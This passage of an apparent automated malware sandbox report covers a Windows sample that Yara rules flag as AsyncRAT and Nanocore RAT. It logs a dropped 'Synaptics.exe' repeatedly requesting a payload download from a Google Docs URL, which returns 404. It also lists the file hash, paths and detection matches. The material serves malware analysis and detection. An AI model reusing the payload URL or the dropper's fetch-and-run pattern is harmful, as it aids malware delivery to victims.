                                                  Set-Cookie: NID=511=ItB4rggOjE7L83nmMdJfyQhAXU45o48wqAdRB-lL5Ie-MdQjOv3okMid3WbfMDZHbnDZr5k9aqXXvSn4CBTAwHSyCdMEU1QFmYWvxj_Bxyqo2--MwRLKKn67BRFBYD59EXcasAatKWIUcsJscCR7xpunrw5_i7il4Vlwvg1bm0Y; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC4INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.349773142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC6INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-RzI2vKOO/RcM9o2uC+wZFw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=oHsspnoaoRPvcVOBycmUhuol6EoOLvfMWKH14ADwtMfMkSbpD4McXBo-NIiw6WK2tPXLjhAxXrYi2j5Wwdpvid_dF8gzqeWxh1UK7pTsTjP_eApiv0c3T4yzPwYAKv1vSBfh3DOcMmuNNBAVV__pNTcD74huBhRy_r2KZ3mXhAA; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC8INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC8INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.349772142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC8INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-3MXOmncPcJvKr/WLBVs8Mw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=mjLYExoCbbzoBBUNtGENtY1M0qKSlrmcXoYIJs_CCALnZCIBOqRp-6QCq8BTRpdonT8b51hpbQiifNkp-lDolBQYDmXkMflxAtOsGTOCzEEwcE_m_YCznKVQUDPJwzWP67jsK7TbGuvkjGhB4aiIzcwX0QCU0QfLneZL1N-82lk; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC9INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC9INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.349774142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC9OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC10INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Content-Security-Policy: script-src 'nonce-ftrJSB7t2WqD3Wc0doJpzQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=tgTMfZ7NTv3R_IbrSihjBb2kk2KK_CmJAfjV8L7E1gj4Y4KyElEhEF7auzo5NNAF14Er8xmdQUjR1JrqDdruxUCOf144megLwLiTcIrUnMGZ3M5zqxV_TbzDZP_KcKlSmjUpwVMXYOVgPbfDy-mE52xpmx5XYc-gW0fNu7Lj6xE; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC11INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC11INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.349775142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC9OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC11INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Content-Security-Policy: script-src 'nonce-g3DFDAYiVjvuKejFhieIhA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=XWSM1KThS4sUsrpzKBe-UXkKfBYAOV_V-pBG4TKFtlwNETSmBsNYLPwdIwLP0C-cxljhicCjVhOhPmGHGngvqmlM2xSVvWyVCpJQp2pHYXPcOD30RrXp7d7_kmx8iB9z6zkwLZ1gA4C9LvCNMS4ZvE6vwxPFj2YLPWJWrLwBtuU; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC12INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC13INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.349777142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC13OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC14INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-nGVV6uaGbC+cgXeCHrTnSA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=VdtJ7dEWxYuwyj39zjdCItptsaZ6X41Pt1W2YzyShAKVYzCo0n_VAjG3Kn-q7l3N32RNwv0zA2ey7csKpdnOYEPwRG8aljEu-tCTLhtS6O7TKkJJn4tmHfofq494iuEnE3vtL1knh7Pf5mhXt5w5tA2uLL2slaN9xSnjd-w54RM; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC16INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC16INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  9192.168.2.349776142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC13OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC13INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-UDhg3Ol/vxNIFYfR64ajjw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=orlJ0NdqZKBuJgdBAEhrpiJB9dinWrdefjKHLXO8dDrwrs2Gl1KvH5O7_-hmsGmBPar5jEJIZpwkTCp2aADXUJ0v22jDK2OpqNdmc3PhtYeUGrfIsg6cJvKc8XJd9d_le0i0QmiTXebU0Dlow0IYxVePmxM_0xdnuzLXfA_AGj0; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC14INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC14INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:02:39:38
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\y8kdmHi6x3.exe"
                                                  Imagebase:0x5b0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  General

                                                  Target ID:4
                                                  Start time:02:39:47
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Imagebase:0xbc0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.314658286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.313768043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.312421482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.313014699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.316511430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:6
                                                  Start time:02:39:54
                                                  Start date:26/01/2022
